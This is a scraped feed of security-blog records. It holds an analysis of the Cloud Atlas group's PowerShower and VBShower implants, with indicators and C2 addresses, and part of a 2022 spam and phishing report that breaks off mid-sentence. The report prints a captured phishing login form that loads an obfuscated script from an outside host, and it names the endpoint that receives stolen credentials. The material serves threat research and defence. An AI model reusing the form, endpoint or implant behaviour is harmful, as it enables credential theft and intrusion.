Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year&#x27;s resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the &quot;preview&quot;, the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims&#x27; personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the &quot;charity&quot; found the victim&#x27;s telephone number in a database of individuals affected by COVID-19. Those who wished to receive the &quot;aid&quot; were asked to state their full name, contact details, date of birth, social security and driver&#x27;s license numbers, gender, and current employer, attaching a scanned copy of their driver&#x27;s license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others&#x27; personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers&#x27; interest in wallet owners&#x27; accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user&#x27;s secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The &quot;giveaways&quot; were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the &quot;giveaways&quot;. Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that &quot;financial assistance&quot; is frequently promised by con artists to swindle you out of your money.\n\n&quot;Promotional campaigns by major banks&quot; were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims&#x27; vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar &quot;campaigns&quot; were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a &quot;Ramadan Relief&quot; program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization&#x27;s logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive &quot;recipient feedback&quot; posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the &quot;shipping costs&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n&quot;Insides&quot; about &quot;private sales&quot; were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user&#x27;s appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the &quot;update&quot;, the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users&#x27; risk of losing personal data was now higher, too. &quot;Well-wishers&quot; who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to &quot;test&quot; a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year&#x27;s celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children&#x27;s drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends&#x27; kids&#x27; works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years&#x27; competition pages, as requests to vote for one&#x27;s friends&#x27; kids are common before public holidays.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is &quot;Nigerian-type&quot; scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims&#x27; email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user&#x27;s email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on &quot;prizes&quot; or &quot;earning money&quot;, messages in other languages, in addition to offering &quot;prizes&quot;, encouraged users to visit &quot;dating sites&quot; \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and &quot;settle the matter&quot;. Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim&#x27;s name to be removed from the &quot;criminal case&quot;. In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more &quot;business offers&quot; are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company&#x27;s profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender&#x27;s addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as &quot;key points of the meeting&quot;. For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up &quot;as part of partial mobilization&quot; or as a &quot;new solution&quot; to safeguard against possible threats on the internet &quot;caused by hostile organizations&quot;.\n\nIn the second case, the program installed on victim&#x27;s computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company&#x27;s products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender&#x27;s email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking &quot;Reply&quot; in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&amp;token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and 